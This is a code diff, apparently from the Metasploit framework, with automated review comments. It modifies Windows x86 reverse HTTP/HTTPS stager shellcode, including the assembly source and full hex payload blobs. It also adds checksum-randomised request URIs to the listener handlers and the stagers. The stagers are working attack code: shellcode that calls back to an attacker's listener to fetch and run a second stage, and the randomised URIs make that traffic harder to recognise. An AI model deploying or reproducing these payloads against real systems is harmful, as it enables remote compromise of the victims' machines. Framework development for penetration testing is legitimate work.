diff --git a/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm b/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm
index 90c44359d9..438738a99d 100644
--- a/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm
+++ b/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm
@@ -12,7 +12,6 @@
load_wininet:
push 0x0074656e ; Push the bytes 'wininet',0 onto the stack.
push 0x696e6977 ; ...
- mov esi, esp ; Save a pointer to wininet
push esp ; Push a pointer to the "wininet" string on the stack.
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA( "wininet" )
@@ -23,7 +22,8 @@ internetopen:
push edi ; LPCTSTR lpszProxyBypass
push edi ; LPCTSTR lpszProxyName
push edi ; DWORD dwAccessType (PRECONFIG = 0)
- push esi ; LPCTSTR lpszAgent ("wininet\x00")
+ push byte 0 ; NULL pointer
+ push esp ; LPCTSTR lpszAgent ("\x00")
push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
call ebp
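Review bot: The comment `; NULL pointer` on `push byte 0` is misleading: that instruction lays down the zero dword that serves as the empty agent string, and the pointer to it is the following `push esp`; write `push byte 0 ; empty string "\x00" (imm8 sign-extended to a dword)` and keep the pointer wording on the next line. That extra dword is never popped, since InternetOpenA is a stdcall API that removes only its five arguments, so the stack is left one slot deeper than before this change; nothing in the hunk depends on it, but a one-line comment saying the slot is intentionally leaked would stop the next reader from "fixing" it. The internetopen hunk in block_reverse_https.asm carries the same comment.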
diff --git a/external/source/shellcode/windows/x86/src/block/block_reverse_https.asm b/external/source/shellcode/windows/x86/src/block/block_reverse_https.asm
index 8679472710..7128d93317 100644
--- a/external/source/shellcode/windows/x86/src/block/block_reverse_https.asm
+++ b/external/source/shellcode/windows/x86/src/block/block_reverse_https.asm
@@ -12,7 +12,6 @@
load_wininet:
push 0x0074656e ; Push the bytes 'wininet',0 onto the stack.
push 0x696e6977 ; ...
- mov esi, esp ; Save a pointer to wininet
push esp ; Push a pointer to the "wininet" string on the stack.
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA( "wininet" )
@@ -23,7 +22,8 @@ internetopen:
push edi ; LPCTSTR lpszProxyBypass
push edi ; LPCTSTR lpszProxyName
push edi ; DWORD dwAccessType (PRECONFIG = 0)
- push esi ; LPCTSTR lpszAgent ("wininet\x00")
+ push byte 0 ; NULL pointer
+ push esp ; LPCTSTR lpszAgent ("\x00")
push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
call ebp
diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index a2f179a3db..dc241353cc 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -29,6 +29,49 @@ module ReverseHttp
"tunnel"
end
+ #
+ # Define 8-bit checksums for matching URLs
+ # These are based on charset frequency
+ #
+ URI_CHECKSUM_INITW = 92
+ URI_CHECKSUM_INITJ = 88
+ URI_CHECKSUM_CONN = 98
+
+ #
+ # Map "random" URIs to static strings, allowing us to randomize
+ # the URI sent in the first request.
+ #
+ def process_uri_resource(uri_match)
+ # This allows 'random' strings to be used as markers for
+ # the INIT and CONN request types, based on a checksum
+ uri_strip, uri_conn = uri_match.split('_', 2)
+ uri_strip.sub!(/^\//, '')
+ uri_check = Rex::Text.checksum8(uri_strip)
+
+ # Match specific checksums and map them to static URIs
+ case uri_check
+ when URI_CHECKSUM_INITW
+ uri_match = "/INITM"
+ when URI_CHECKSUM_INITJ
+ uri_match = "/INITJM"
+ when URI_CHECKSUM_CONN
+ uri_match = "/CONN_" + ( uri_conn || Rex::Text.rand_text_alphanumeric(16) )
+ end
+
+ uri_match
+ end
+
+ #
+ # Create a URI that matches a given checksum
+ #
+ def generate_uri_checksum(sum)
+ 0.upto(1000) do
+ uri = Rex::Text.rand_text_alphanumeric(4)
+ return uri if Rex::Text.checksum8(uri) == sum
+ end
+ raise RuntimeError, "Unable to generate a string with checksum #{sum}"
+ end
+
#
# Initializes the HTTP SSL tunneling handler.
#
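Review bot: `process_uri_resource` raises on a bare `/` request: `"/".split('_', 2)` yields `"/"`, the `sub!` strips it to `""`, and `Rex::Text.checksum8("")` then fails because `inject(:+)` over an empty array returns nil (an empty `uri_match` is worse, as `uri_strip` itself is nil before `sub!`). Guard before hashing, e.g. `uri_strip = uri_strip.to_s.sub(/\A\//, '')` followed by `return uri_match if uri_strip.empty?`, which also replaces the per-line anchor `^` with `\A`. Separately, `generate_uri_checksum` gives up after 1001 draws although each 4-character draw hits a given 8-bit sum with probability near 1/256, so roughly (255/256)^1001 ≈ 2% of calls raise; a much larger bound such as `1.upto(100_000)` makes that negligible, and `raise "Unable to generate ..."` needs no explicit `RuntimeError`. Both definitions are repeated verbatim in lib/msf/core/handler/reverse_https.rb (its hunk at line 29) and need the same fixes there.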
@@ -139,13 +182,15 @@ protected
end
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
-
+
+ uri_match = process_uri_resource(req.relative_resource)
+
# Process the requested resource.
- case req.relative_resource
+ case uri_match
when /^\/INITJM/
print_line("Java: #{req.relative_resource}")
- conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
+ conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
print_line "URL: #{url.inspect}"
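Review bot: `conn_id` now depends on `generate_uri_checksum`, which raises when it cannot find a matching string, and nothing in this request path rescues it, so a failed draw aborts handling of that client's request with an uncaught exception (the enclosing method starts and ends outside the hunk). Either make the helper infallible or wrap the call and log through the existing channel, e.g. `rescue RuntimeError => e` then `print_status("#{cli.peerhost}:#{cli.peerport} #{e.message}")`, since `cli` is in scope here. The same unguarded call appears in the later hunk of this file (`@@ -192,7 +237,7 @@`) and at both `conn_id` sites in lib/msf/core/handler/reverse_https.rb.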
@@ -192,7 +237,7 @@ protected
end
print_status("Patched transport at offset #{i}...")
- conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
+ conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
i = blob.index("https://" + ("X" * 256))
if i
url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
@@ -248,7 +293,7 @@ protected
})
end
else
- print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{req.relative_resource} #{req.inspect}...")
+ print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{uri_match} #{req.inspect}...")
resp.code = 200
resp.message = "OK"
resp.body = "
No site configured at this address
"
@@ -265,4 +310,3 @@ end
end
end
-
diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb
index cb9939ad13..a8148a88f3 100644
--- a/lib/msf/core/handler/reverse_https.rb
+++ b/lib/msf/core/handler/reverse_https.rb
@@ -29,6 +29,50 @@ module ReverseHttps
"tunnel"
end
+ #
+ # Define 8-bit checksums for matching URLs
+ # These are based on charset frequency
+ #
+ URI_CHECKSUM_INITW = 92
+ URI_CHECKSUM_INITJ = 88
+ URI_CHECKSUM_CONN = 98
+
+ #
+ # Map "random" URIs to static strings, allowing us to randomize
+ # the URI sent in the first request.
+ #
+ def process_uri_resource(uri_match)
+
+ # This allows 'random' strings to be used as markers for
+ # the INIT and CONN request types, based on a checksum
+ uri_strip, uri_conn = uri_match.split('_', 2)
+ uri_strip.sub!(/^\//, '')
+ uri_check = Rex::Text.checksum8(uri_strip)
+
+ # Match specific checksums and map them to static URIs
+ case uri_check
+ when URI_CHECKSUM_INITW
+ uri_match = "/INITM"
+ when URI_CHECKSUM_INITJ
+ uri_match = "/INITJM"
+ when URI_CHECKSUM_CONN
+ uri_match = "/CONN_" + ( uri_conn || Rex::Text.rand_text_alphanumeric(16) )
+ end
+
+ uri_match
+ end
+
+ #
+ # Create a URI that matches a given checksum
+ #
+ def generate_uri_checksum(sum)
+ 0.upto(1000) do
+ uri = Rex::Text.rand_text_alphanumeric(4)
+ return uri if Rex::Text.checksum8(uri) == sum
+ end
+ raise RuntimeError, "Unable to generate a string with checksum #{sum}"
+ end
+
#
# Initializes the HTTP SSL tunneling handler.
#
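Review bot: These three constants and both helpers are a verbatim copy of the ones added to lib/msf/core/handler/reverse_http.rb, and the stagers reach them through two different namespaces (`Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW` in reverse_http.rb and reverse_ipv6_http.rb, `Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW` in the https stagers), so editing one checksum value silently desynchronises listener and generated stager. Define them once, e.g. `URI_CHECKSUM_INITW = Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW` here or by moving the trio and both methods into a shared mixin both handlers include, and delete the duplicate bodies. The stray blank line after `def process_uri_resource(uri_match)` is also absent in the http copy.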
@@ -137,16 +181,18 @@ protected
lhost = datastore['LHOST']
# Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance)
- if lhost.empty? or lhost == '0.0.0.0'or lhost == '::'
+ if lhost.empty? or lhost == '0.0.0.0' or lhost == '::'
lhost = Rex::Socket.source_address(cli.peerhost)
end
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+ uri_match = process_uri_resource(req.relative_resource)
+
# Process the requested resource.
- case req.relative_resource
+ case uri_match
when /^\/INITJM/
- conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
+ conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
#$stdout.puts "URL: #{url.inspect}"
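Review bot: The corrected condition `if lhost.empty? or lhost == '0.0.0.0' or lhost == '::'` still uses `or`, whose low precedence bites as soon as the expression is assigned or combined; write `if lhost.empty? || lhost == '0.0.0.0' || lhost == '::'`. If `datastore['LHOST']` can be unset, `lhost.empty?` fails on nil — `lhost = datastore['LHOST'].to_s` on the preceding line covers it, and the stagers already call `.to_s` on the same value. The enclosing method starts and ends outside the hunk.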
@@ -192,7 +238,7 @@ protected
end
print_status("Patched transport at offset #{i}...")
- conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
+ conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
i = blob.index("https://" + ("X" * 256))
if i
url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
@@ -246,7 +292,7 @@ protected
})
end
else
- print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{req.relative_resource} #{req.inspect}...")
+ print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{uri_match} #{req.inspect}...")
resp.code = 200
resp.message = "OK"
resp.body = "No site configured at this address
"
diff --git a/lib/rex/text.rb b/lib/rex/text.rb
index b3974f2cbd..d18ba7ced3 100644
--- a/lib/rex/text.rb
+++ b/lib/rex/text.rb
@@ -1214,6 +1214,26 @@ protected
@@codepage_map_cache = map
end
+ def self.checksum8(str)
+ str.unpack("C*").inject(:+) % 0x100
+ end
+
+ def self.checksum16_le(str)
+ str.unpack("v*").inject(:+) % 0x10000
+ end
+
+ def self.checksum16_be(str)
+ str.unpack("n*").inject(:+) % 0x10000
+ end
+
+ def self.checksum32_le(str)
+ str.unpack("V*").inject(:+) % 0x100000000
+ end
+
+ def self.checksum32_be(str)
+ str.unpack("N*").inject(:+) % 0x100000000
+ end
+
end
end
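Review bot: All five helpers fail on an empty string: `"".unpack("C*")` is `[]`, `[].inject(:+)` is nil, and `nil % 0x100` raises NoMethodError — and the new handler code does call `checksum8` on a stripped request path that can be empty. Seed the fold instead, `str.unpack("C*").inject(0, :+) % 0x100`, and likewise for the other four. The 16- and 32-bit variants also silently ignore trailing bytes that do not fill a whole word because `unpack("v*")` and friends stop at the last complete element; a YARD line per method such as `# @return [Integer] sum of the string's bytes modulo 2**8` (words modulo 2**16 / 2**32, trailing partial word ignored) would spare callers that surprise.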
diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb
index 8f5b9f9c98..6b669ff713 100644
--- a/modules/payloads/stagers/windows/reverse_http.rb
+++ b/modules/payloads/stagers/windows/reverse_http.rb
@@ -38,28 +38,28 @@ module Metasploit3
# 'EXITFUNC' => [ 290, 'V' ],
'LPORT' => [ 190, 'v' ], # Not a typo, really little endian
},
- 'Payload' =>
- "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
- "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
- "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
- "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
- "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
- "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
- "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
- "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
- "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
- "\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x89\xE6\x54\x68\x4C\x77" +
- "\x26\x07\xFF\xD5\x31\xFF\x57\x57\x57\x57\x56\x68\x3A\x56\x79\xA7" +
- "\xFF\xD5\xEB\x4B\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
- "\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x34\x59\x31\xD2" +
- "\x52\x68\x00\x02\x20\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
- "\x3B\xFF\xD5\x89\xC6\x6A\x10\x5B\x31\xFF\x57\x57\x57\x57\x56\x68" +
- "\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x1A\x4B\x74\x10\xEB\xE9\xEB" +
- "\x49\xE8\xC7\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00\x68\xF0\xB5" +
- "\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00" +
- "\x57\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68\x00" +
- "\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74\xCD" +
- "\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x65\xFF\xFF\xFF"
+ 'Payload' =>
+ "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
+ "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
+ "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
+ "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
+ "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
+ "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
+ "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
+ "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
+ "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
+ "\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07" +
+ "\xFF\xD5\x31\xFF\x57\x57\x57\x57\x6A\x00\x54\x68\x3A\x56\x79\xA7" +
+ "\xFF\xD5\xEB\x4B\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
+ "\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x34\x59\x31\xD2" +
+ "\x52\x68\x00\x02\x20\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
+ "\x3B\xFF\xD5\x89\xC6\x6A\x10\x5B\x31\xFF\x57\x57\x57\x57\x56\x68" +
+ "\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x1A\x4B\x74\x10\xEB\xE9\xEB" +
+ "\x49\xE8\xC7\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00\x68\xF0\xB5" +
+ "\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00" +
+ "\x57\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68\x00" +
+ "\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74\xCD" +
+ "\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x65\xFF\xFF\xFF"
}
))
end
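Review bot: The whole `'Payload'` blob is re-indented although only the bytes on the two `\x68\x6E\x65\x74` lines changed (`\x89\xE6` dropped, `\x56` → `\x54`, `\x6A\x00` added), which buries the real change in a 42-line diff; the old and new sequences are both 32 bytes, so the `'Offsets'` entries above remain valid, but nothing records that. Add a comment above the blob, e.g. `# Assembled from the blocks under external/source/shellcode/windows/x86/src/block/; this revision changed bytes only, not length, so 'Offsets' are unchanged`, so the next edit can be checked against the source. The same applies to the payload hunks in reverse_https.rb, reverse_ipv6_http.rb and reverse_ipv6_https.rb.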
@@ -77,7 +77,7 @@ module Metasploit3
def generate
p = super
i = p.index("/12345\x00")
- u = "/INITM\x00"
+ u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00"
p[i, u.length] = u
p + datastore['LHOST'].to_s + "\x00"
end
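Review bot: `u` is now 6 bytes (`"/"` plus four characters plus NUL) written over the 7-byte `/12345\x00` placeholder, so the string stays terminated only because the placeholder's own last NUL is left untouched by `p[i, u.length] = u`; anyone lengthening the generated segment later would silently lose that terminator. Add `# 6 bytes overwrite the 7-byte "/12345\x00" placeholder; its final NUL is kept as the terminator` above the assignment, or replace exactly `"/12345\x00".length` bytes with `u` padded to that length so the invariant is explicit. `generate_uri_checksum` can also raise out of `generate`, which the caller presumably does not expect from payload generation. The identical change is in reverse_https.rb, reverse_ipv6_http.rb and reverse_ipv6_https.rb.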
diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb
index 3ab266f567..ec84371aaa 100644
--- a/modules/payloads/stagers/windows/reverse_https.rb
+++ b/modules/payloads/stagers/windows/reverse_https.rb
@@ -48,8 +48,8 @@ module Metasploit3
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
- "\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x89\xE6\x54\x68\x4C\x77" +
- "\x26\x07\xFF\xD5\x31\xFF\x57\x57\x57\x57\x56\x68\x3A\x56\x79\xA7" +
+ "\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07" +
+ "\xFF\xD5\x31\xFF\x57\x57\x57\x57\x6A\x00\x54\x68\x3A\x56\x79\xA7" +
"\xFF\xD5\xEB\x5F\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
"\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x48\x59\x31\xD2" +
"\x52\x68\x00\x32\xA0\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
@@ -79,7 +79,7 @@ module Metasploit3
def generate
p = super
i = p.index("/12345\x00")
- u = "/INITM\x00"
+ u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW) + "\x00"
p[i, u.length] = u
p + datastore['LHOST'].to_s + "\x00"
end
diff --git a/modules/payloads/stagers/windows/reverse_ipv6_http.rb b/modules/payloads/stagers/windows/reverse_ipv6_http.rb
index 82f23f7600..cc15f9f259 100644
--- a/modules/payloads/stagers/windows/reverse_ipv6_http.rb
+++ b/modules/payloads/stagers/windows/reverse_ipv6_http.rb
@@ -39,27 +39,27 @@ module Metasploit3
'LPORT' => [ 190, 'v' ], # Not a typo, really little endian
},
'Payload' =>
- "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
- "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
- "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
- "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
- "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
- "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
- "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
- "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
- "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
- "\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x89\xE6\x54\x68\x4C\x77" +
- "\x26\x07\xFF\xD5\x31\xFF\x57\x57\x57\x57\x56\x68\x3A\x56\x79\xA7" +
- "\xFF\xD5\xEB\x4B\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
- "\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x34\x59\x31\xD2" +
- "\x52\x68\x00\x02\x20\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
- "\x3B\xFF\xD5\x89\xC6\x6A\x10\x5B\x31\xFF\x57\x57\x57\x57\x56\x68" +
- "\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x1A\x4B\x74\x10\xEB\xE9\xEB" +
- "\x49\xE8\xC7\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00\x68\xF0\xB5" +
- "\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00" +
- "\x57\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68\x00" +
- "\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74\xCD" +
- "\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x65\xFF\xFF\xFF"
+ "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
+ "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
+ "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
+ "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
+ "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
+ "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
+ "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
+ "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
+ "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
+ "\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07" +
+ "\xFF\xD5\x31\xFF\x57\x57\x57\x57\x6A\x00\x54\x68\x3A\x56\x79\xA7" +
+ "\xFF\xD5\xEB\x4B\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
+ "\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x34\x59\x31\xD2" +
+ "\x52\x68\x00\x02\x20\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
+ "\x3B\xFF\xD5\x89\xC6\x6A\x10\x5B\x31\xFF\x57\x57\x57\x57\x56\x68" +
+ "\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x1A\x4B\x74\x10\xEB\xE9\xEB" +
+ "\x49\xE8\xC7\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00\x68\xF0\xB5" +
+ "\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00" +
+ "\x57\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68\x00" +
+ "\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74\xCD" +
+ "\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x65\xFF\xFF\xFF"
}
))
end
@@ -77,7 +77,7 @@ module Metasploit3
def generate
p = super
i = p.index("/12345\x00")
- u = "/INITM\x00"
+ u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00"
p[i, u.length] = u
lhost = datastore['LHOST'] || "0000:0000:0000:0000:0000:0000:0000:0000"
@@ -94,5 +94,6 @@ module Metasploit3
def wfs_delay
20
end
+
end
diff --git a/modules/payloads/stagers/windows/reverse_ipv6_https.rb b/modules/payloads/stagers/windows/reverse_ipv6_https.rb
index ec01ff346e..95b2d2af2e 100644
--- a/modules/payloads/stagers/windows/reverse_ipv6_https.rb
+++ b/modules/payloads/stagers/windows/reverse_ipv6_https.rb
@@ -48,8 +48,8 @@ module Metasploit3
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
- "\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x89\xE6\x54\x68\x4C\x77" +
- "\x26\x07\xFF\xD5\x31\xFF\x57\x57\x57\x57\x56\x68\x3A\x56\x79\xA7" +
+ "\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07" +
+ "\xFF\xD5\x31\xFF\x57\x57\x57\x57\x6A\x00\x54\x68\x3A\x56\x79\xA7" +
"\xFF\xD5\xEB\x5F\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
"\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x48\x59\x31\xD2" +
"\x52\x68\x00\x32\xA0\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
@@ -79,7 +79,7 @@ module Metasploit3
def generate
p = super
i = p.index("/12345\x00")
- u = "/INITM\x00"
+ u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW) + "\x00"
p[i, u.length] = u
lhost = datastore['LHOST'] || "0000:0000:0000:0000:0000:0000:0000:0000"